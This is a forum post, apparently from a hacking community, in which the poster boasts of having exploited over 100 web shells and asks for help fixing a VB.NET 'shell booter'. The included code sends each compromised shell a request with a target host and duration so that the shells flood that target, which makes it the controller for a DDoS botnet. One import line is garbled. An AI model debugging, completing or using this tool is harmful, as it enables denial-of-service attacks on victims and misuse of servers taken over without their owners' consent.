Problem with Shell Booter
Hi, i just exploited over 100 ddos Working Shells and i want to make a easy custom vb.net shell booter.
But this code dont seem to work!
Code:
Imports System.Net
Imports System.Text
Imports System.Net.Sockets
Imports System.Diagnostics
Imports System****
Imports System.Threading
Imports MySql.Data.MySqlClient
Public Class Stress
Private Sub HuraButton1_Click(sender As Object, e As EventArgs) Handles HuraButton1.Click
If HuraTextBox2.Text > 90 Then
MsgBox("ERROR: Max Boot Time 90 Secounds", MsgBoxStyle.Exclamation)
Else
Dim i As Integer = 0
For Each item In ListBox1.Items
Dim request1 As WebRequest = WebRequest.Create(ListBox1.Items(i) + "?act=phptools&host=" + TextBox1.Text + "&time=" + TextBox2.Text)
i = i + 1
Next item
End If
End Sub